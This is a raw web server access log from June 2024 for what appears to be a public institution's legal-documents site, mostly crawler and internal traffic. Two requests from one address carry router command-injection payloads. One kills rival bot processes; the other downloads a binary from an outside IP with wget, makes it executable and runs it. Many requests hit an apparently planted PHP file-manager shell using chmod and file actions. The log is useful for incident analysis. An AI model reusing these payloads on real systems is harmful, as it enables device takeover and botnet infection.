156.146.57.104 - - [29/Jun/2024:03:22:40 -0500] "GET /frontend_dev.php/$ HTTP/1.1" 404 1018
156.146.57.104 - - [29/Jun/2024:03:22:41 -0500] "POST / HTTP/1.1" 200 319
66.249.66.11 - - [29/Jun/2024:03:22:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5348.pdf HTTP/1.1" 200 395921
172.22.2.4 - - [29/Jun/2024:03:22:55 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-146-16.docx HTTP/1.1" 200 23021
201.245.192.253 - - [29/Jun/2024:03:22:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:03:23:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2121.pdf HTTP/1.1" 200 579017
66.249.66.13 - - [29/Jun/2024:03:23:18 -0500] "GET /BLA/resoluciones/AUTOS%202020/0850.pdf HTTP/1.1" 200 467939
66.249.66.11 - - [29/Jun/2024:03:23:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6191.pdf HTTP/1.1" 200 661736
201.245.192.253 - - [29/Jun/2024:03:23:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:23:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.216 - - [29/Jun/2024:03:24:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/2625.pdf HTTP/1.1" 304 -
66.249.66.11 - - [29/Jun/2024:03:24:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2885.pdf HTTP/1.1" 200 410268
201.245.192.253 - - [29/Jun/2024:03:24:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:03:25:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3029.pdf HTTP/1.1" 200 348536
66.249.66.13 - - [29/Jun/2024:03:25:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5600.pdf HTTP/1.1" 200 500107
52.167.144.25 - - [29/Jun/2024:03:25:32 -0500] "GET /Publicaciones/2024EE54909.pdf HTTP/1.1" 404 227
104.28.30.74 - - [29/Jun/2024:03:25:53 -0500] "GET /Publicaciones/2023EE14325.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:03:25:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:25:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.27.113 - - [29/Jun/2024:03:26:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3794.pdf HTTP/1.1" 200 2740
47.128.62.86 - - [29/Jun/2024:03:26:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5183.pdf HTTP/1.1" 200 2715
66.249.66.12 - - [29/Jun/2024:03:26:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2567.pdf HTTP/1.1" 200 1445779
47.128.48.54 - - [29/Jun/2024:03:26:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3951.pdf HTTP/1.1" 200 2739
66.249.66.12 - - [29/Jun/2024:03:26:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20151-200/2002RES173.tif HTTP/1.1" 200 166104
201.245.192.253 - - [29/Jun/2024:03:26:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [29/Jun/2024:03:26:51 -0500] "HEAD / HTTP/1.1" 200 -
47.128.43.26 - - [29/Jun/2024:03:26:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3027.PDF HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:03:26:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:03:27:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36528
201.245.192.253 - - [29/Jun/2024:03:27:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35233
172.22.2.4 - - [29/Jun/2024:03:25:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.48.85 - - [29/Jun/2024:03:27:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3398.pdf HTTP/1.1" 200 2740
66.249.66.11 - - [29/Jun/2024:03:27:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201301-1350/20021342.tif HTTP/1.1" 200 40164
47.128.43.2 - - [29/Jun/2024:03:27:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3774.pdf HTTP/1.1" 200 2715
66.249.66.11 - - [29/Jun/2024:03:27:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4052.pdf HTTP/1.1" 200 1655060
47.128.41.208 - - [29/Jun/2024:03:27:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4428.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:03:27:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:27:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:03:26:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
47.128.41.197 - - [29/Jun/2024:03:28:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3158.pdf HTTP/1.1" 200 2740
47.128.36.161 - - [29/Jun/2024:03:28:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4665.pdf HTTP/1.1" 200 2735
66.249.66.11 - - [29/Jun/2024:03:28:38 -0500] "GET /BLA/resoluciones/AUTOS%202023/4161.pdf HTTP/1.1" 200 1076117
47.128.41.209 - - [29/Jun/2024:03:28:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3433.pdf HTTP/1.1" 200 2740
66.249.66.12 - - [29/Jun/2024:03:28:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3255.pdf HTTP/1.1" 200 416741
201.245.192.253 - - [29/Jun/2024:03:28:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:03:29:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:29:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:03:30:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4120.pdf HTTP/1.1" 200 786060
201.245.192.253 - - [29/Jun/2024:03:30:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35233
201.245.192.253 - - [29/Jun/2024:03:29:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35513
52.167.144.25 - - [29/Jun/2024:03:30:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20801%20AL%20900/RESOLUCION%200803%20DE%202007.pdf HTTP/1.1" 200 251293
172.22.2.4 - - [29/Jun/2024:03:30:35 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1043
201.245.192.253 - - [29/Jun/2024:03:30:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:03:31:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1282.pdf HTTP/1.1" 200 391199
66.249.66.11 - - [29/Jun/2024:03:31:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20101-150/2002RES136.tif HTTP/1.1" 200 101946
152.53.44.195 - - [29/Jun/2024:03:31:38 -0500] "GET /Publicaciones/2023EE12464.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:03:31:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [29/Jun/2024:03:31:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:03:31:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:31:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
104.152.52.151 - - [29/Jun/2024:03:32:11 -0500] "GET / HTTP/1.0" 200 319
66.249.66.11 - - [29/Jun/2024:03:32:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201501-1550/20021506.tif HTTP/1.1" 200 86610
172.22.2.4 - - [29/Jun/2024:03:30:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51133
66.249.66.12 - - [29/Jun/2024:03:32:39 -0500] "GET /transparencia/financiera/2%20Desagregado%20con%20modificaciones/1%20Vigencia%20actual/8%20Modificaciones%20Pptales%20Mayo%202024.xlsx HTTP/1.1" 200 23636
66.249.66.12 - - [29/Jun/2024:03:32:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4190.pdf HTTP/1.1" 200 494837
201.245.192.253 - - [29/Jun/2024:03:32:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:03:31:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Jun/2024:03:32:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
66.249.66.12 - - [29/Jun/2024:03:33:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1304.pdf HTTP/1.1" 200 1052669
201.245.192.253 - - [29/Jun/2024:03:33:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:33:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:03:34:35 -0500] "GET /BLA/resoluciones/AUTOS%202024/01122.pdf HTTP/1.1" 304 -
216.244.66.195 - - [29/Jun/2024:03:34:52 -0500] "GET /BLA/resoluciones/AUTOS%202016/2621.pdf HTTP/1.1" 200 360999
172.22.2.4 - - [29/Jun/2024:03:34:57 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2001%20del%2027%20de%20Junio%20de%202018.pdf HTTP/1.1" 304 -
172.22.2.4 - - [29/Jun/2024:03:34:57 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:03:34:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:03:35:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5525.pdf HTTP/1.1" 200 360928
201.245.192.253 - - [29/Jun/2024:03:35:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:35:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
141.98.83.197 - - [29/Jun/2024:03:36:09 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [29/Jun/2024:03:36:10 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
66.249.66.12 - - [29/Jun/2024:03:36:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0513.pdf HTTP/1.1" 200 418147
66.249.66.11 - - [29/Jun/2024:03:36:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%2051-100/2002RES75.tif HTTP/1.1" 200 41918
201.245.192.253 - - [29/Jun/2024:03:36:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [29/Jun/2024:03:36:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Jun/2024:03:36:58 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:03:36:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:03:37:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20551-600/00000594.tif HTTP/1.1" 200 99126
201.245.192.253 - - [29/Jun/2024:03:37:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36528
201.245.192.253 - - [29/Jun/2024:03:37:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35233
172.225.253.133 - - [29/Jun/2024:03:37:24 -0500] "GET /Publicaciones/2023EE13449.pdf HTTP/1.1" 404 227
66.249.66.11 - - [29/Jun/2024:03:37:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1312.pdf HTTP/1.1" 200 476023
201.245.192.253 - - [29/Jun/2024:03:37:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:37:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:03:38:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/2442.pdf HTTP/1.1" 200 330943
216.244.66.195 - - [29/Jun/2024:03:38:38 -0500] "GET /BLA/resoluciones/AUTOS%202023/3280.pdf HTTP/1.1" 200 2154409
66.249.66.13 - - [29/Jun/2024:03:38:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0469.pdf HTTP/1.1" 200 356743
172.22.2.4 - - [29/Jun/2024:03:37:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:03:38:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.24 - - [29/Jun/2024:03:39:07 -0500] "GET /Publicaciones/2024EE125072.pdf HTTP/1.1" 404 228
201.245.192.253 - - [29/Jun/2024:03:39:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35513
216.244.66.195 - - [29/Jun/2024:03:39:31 -0500] "GET /BLA/resoluciones/AUTOS%202023/3684.pdf HTTP/1.1" 200 422808
172.22.2.4 - - [29/Jun/2024:03:38:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [29/Jun/2024:03:39:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:39:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:03:40:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35233
201.245.192.253 - - [29/Jun/2024:03:40:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:03:41:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0298.pdf HTTP/1.1" 200 332462
66.249.66.11 - - [29/Jun/2024:03:41:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201301-1350/20021304.tif HTTP/1.1" 200 40406
201.245.192.253 - - [29/Jun/2024:03:41:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
136.25.48.138 - - [29/Jun/2024:03:41:46 -0500] "GET /Publicaciones/2023EE16801.pdf HTTP/1.1" 404 227
216.245.221.92 - - [29/Jun/2024:03:41:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:03:41:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [29/Jun/2024:03:41:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201451-1500/20021457.tif HTTP/1.1" 200 40590
201.245.192.253 - - [29/Jun/2024:03:41:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:03:42:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2372.pdf HTTP/1.1" 200 391910
66.249.66.11 - - [29/Jun/2024:03:42:39 -0500] "GET /BLA/resoluciones/AUTOS%202023/0869.pdf HTTP/1.1" 200 862914
47.128.118.39 - - [29/Jun/2024:03:42:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3556.pdf HTTP/1.1" 200 2715
201.245.192.253 - - [29/Jun/2024:03:42:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.118.31 - - [29/Jun/2024:03:43:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3300.pdf HTTP/1.1" 200 2740
66.249.66.12 - - [29/Jun/2024:03:43:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0315.pdf HTTP/1.1" 200 370010
216.244.66.195 - - [29/Jun/2024:03:43:06 -0500] "GET /BLA/resoluciones/AUTOS%202022/05162.pdf HTTP/1.1" 200 460664
47.128.118.88 - - [29/Jun/2024:03:43:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2340.PDF HTTP/1.1" 200 3035
47.128.118.88 - - [29/Jun/2024:03:43:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.118.88 - - [29/Jun/2024:03:43:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.118.88 - - [29/Jun/2024:03:43:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.118.88 - - [29/Jun/2024:03:43:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.118.88 - - [29/Jun/2024:03:43:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.118.88 - - [29/Jun/2024:03:43:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.118.88 - - [29/Jun/2024:03:43:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.118.88 - - [29/Jun/2024:03:43:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.118.88 - - [29/Jun/2024:03:43:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.118.88 - - [29/Jun/2024:03:43:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.118.55 - - [29/Jun/2024:03:43:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3787.pdf HTTP/1.1" 200 2715
47.128.118.35 - - [29/Jun/2024:03:43:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=6601.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:03:43:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [29/Jun/2024:03:43:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/01888.pdf HTTP/1.1" 200 888762
201.245.192.253 - - [29/Jun/2024:03:43:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:03:44:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2328.pdf HTTP/1.1" 200 566649
47.128.30.209 - - [29/Jun/2024:03:44:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3048.pdf HTTP/1.1" 200 2715
47.128.62.25 - - [29/Jun/2024:03:44:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3560.pdf HTTP/1.1" 200 2739
172.22.2.4 - - [29/Jun/2024:03:43:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.46.159 - - [29/Jun/2024:03:44:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2982.PDF HTTP/1.1" 200 2741
201.245.192.253 - - [29/Jun/2024:03:44:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.30.208 - - [29/Jun/2024:03:45:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=6667.pdf HTTP/1.1" 200 2715
47.128.20.64 - - [29/Jun/2024:03:45:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4315.pdf HTTP/1.1" 200 2740
216.244.66.195 - - [29/Jun/2024:03:45:25 -0500] "GET /galeria/galeria/fotos/Movilizacion10G.jpg HTTP/1.1" 200 132880
66.249.66.12 - - [29/Jun/2024:03:45:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1883.pdf HTTP/1.1" 200 418895
172.22.2.4 - - [29/Jun/2024:03:43:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51986
66.249.66.11 - - [29/Jun/2024:03:45:34 -0500] "GET /BLA/resoluciones/AUTOS%202024/01975.pdf HTTP/1.1" 304 -
47.128.61.122 - - [29/Jun/2024:03:45:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3416.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:03:45:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.96.40 - - [29/Jun/2024:03:45:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5225.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:03:45:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:03:46:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%2051-100/2002RES53.tif HTTP/1.1" 200 167280
47.128.61.10 - - [29/Jun/2024:03:46:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3405.pdf HTTP/1.1" 200 2715
66.249.66.12 - - [29/Jun/2024:03:46:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0377.pdf HTTP/1.1" 200 295752
47.128.60.70 - - [29/Jun/2024:03:46:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3457.pdf HTTP/1.1" 200 2740
66.249.66.11 - - [29/Jun/2024:03:46:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0332.pdf HTTP/1.1" 200 451932
201.245.192.253 - - [29/Jun/2024:03:46:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.60.81 - - [29/Jun/2024:03:46:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4187.pdf HTTP/1.1" 200 2715
66.249.66.11 - - [29/Jun/2024:03:46:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%2051-100/2002RES90.tif HTTP/1.1" 200 303788
216.245.221.92 - - [29/Jun/2024:03:46:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:03:46:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.124.169 - - [29/Jun/2024:03:47:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3531.pdf HTTP/1.1" 200 2715
47.128.96.182 - - [29/Jun/2024:03:47:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3255.pdf HTTP/1.1" 200 2739
66.249.66.11 - - [29/Jun/2024:03:47:22 -0500] "GET /BLA/resoluciones/AUTOS%202020/4234.pdf HTTP/1.1" 200 385776
66.249.66.11 - - [29/Jun/2024:03:47:35 -0500] "GET /BLA/resoluciones/AUTOS%202023/1787.pdf HTTP/1.1" 304 -
66.249.66.11 - - [29/Jun/2024:03:47:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0166.pdf HTTP/1.1" 200 356888
47.128.28.122 - - [29/Jun/2024:03:47:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=2881.pdf HTTP/1.1" 200 2715
47.128.45.3 - - [29/Jun/2024:03:47:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4015.pdf HTTP/1.1" 200 2739
201.245.192.253 - - [29/Jun/2024:03:47:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:47:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.124.139 - - [29/Jun/2024:03:48:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3525.pdf HTTP/1.1" 200 2739
216.244.66.195 - - [29/Jun/2024:03:48:16 -0500] "GET /BLA/resoluciones/AUTOS%202023/02830.pdf HTTP/1.1" 200 743266
52.167.144.221 - - [29/Jun/2024:03:48:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0449.pdf HTTP/1.1" 200 6520640
52.167.144.203 - - [29/Jun/2024:03:48:35 -0500] "GET /BLA/resoluciones/AUTOS%202017/2247.pdf HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:03:48:36 -0500] "GET /BLA/resoluciones/AUTOS%202023/3518.pdf HTTP/1.1" 200 405096
66.249.66.11 - - [29/Jun/2024:03:48:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1851.pdf HTTP/1.1" 200 433390
201.245.192.253 - - [29/Jun/2024:03:48:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:03:49:02 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000013%20DEL%2012%20DE%20DICIEMBRE%20DEL%202023.pdf HTTP/1.1" 304 -
